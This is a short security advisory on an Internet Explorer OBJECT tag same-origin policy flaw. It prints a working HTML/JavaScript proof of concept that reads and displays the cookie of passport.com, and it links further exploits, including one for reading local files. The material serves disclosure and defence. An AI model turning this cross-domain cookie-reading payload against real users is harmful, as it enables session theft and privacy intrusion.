Microsoft Internet Explorer OBJECT Tag Same Origin Policy Violation Vulnerability
Thor Larholm <thor@pivx.com> has provided proof of concept exploits at the following location:

http://www.PivX.com/larholm/adv/TL003/

The following example, also provided, will display the cookie associated with the domain www.passport.com:

    <object id="data" data="empty.html" type="text/html"></object>
    <script>
    var ref=document.getElementById("data").object;
    ref.location.href = "http://www.passport.com";
    setTimeout("alert(ref.cookie)",5000);
    </script>

A proof-of-concept is available which demonstrates that this issue may be exploited to read some non-parseable files (such as .ini and .bat extensions):

http://www.murphy.101main.net/localread.htm